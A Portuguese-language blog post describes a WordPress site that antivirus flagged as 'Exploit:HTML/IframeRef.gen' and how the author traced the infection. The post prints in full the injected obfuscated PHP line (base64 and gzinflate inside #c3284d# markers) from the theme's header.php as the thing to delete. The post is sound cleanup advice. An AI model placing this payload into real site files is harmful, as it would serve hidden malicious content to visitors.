Recentemente tive um problema com um Blog em WordPress. Quando o Blog era acessado da minha máquina, o anti-vírus “Microsoft Security Essentials” da Microsoft acusava o vírus “Exploit:HTML/IframeRef.gen” de Nível de Alerta “Grave”. Comecei então a minha investigação para descobrir o vírus.

Procurei soluções na internet, porém não encontrei muita coisa sobre isso. O segundo passo foi desabilitar todos os meus plugins, mesmo assim o vírus continuava. Eu estava usando o template twentyeleven todo customizado, resolvi então voltar o template ao estado original, ou seja, retirei toda customização que inseri no template. Mesmo assim o vírus continuava.

Depois de toda essa investigação, resolvi dar uma olhada na linha 68 no arquivo header.php do template twentyeleven, nessa linha havia um código que estava em base 64, e sinceramente eu não entendia porque aquele script estava ali. Tentei decodificar o script mas não consegui. Ao retirar o script verifiquei que o vírus não foi mais detectado.

Solução

Na pasta wp-content/themes/twentyeleven abra o arquivo header.php, vá até a linha 68 e retire o seguinte código:

#c3284d#
echo(gzinflate(base64_decode("JY5BDoIwEEX3JtyhmQ26oYlLbTmFFxjKSMdA27SD6O0tsvt5yfv/m+IyJ1HyTWRB6CP6hW88KPTNaYxuXShIt2UWOreGnxkXUiU7C14k3bR2OGBgLDTTSKFzcekw6yIopUs+gQrVsPDYWIQyqNoe55nDZAFXiaD+lUPMI2ULoQKceQoWXB3eBU88ebFwBbXxKH5PvdHHlb693JuT0cfn/gc=")));
#/c3284d#

Espero que tenha ajudado 🙂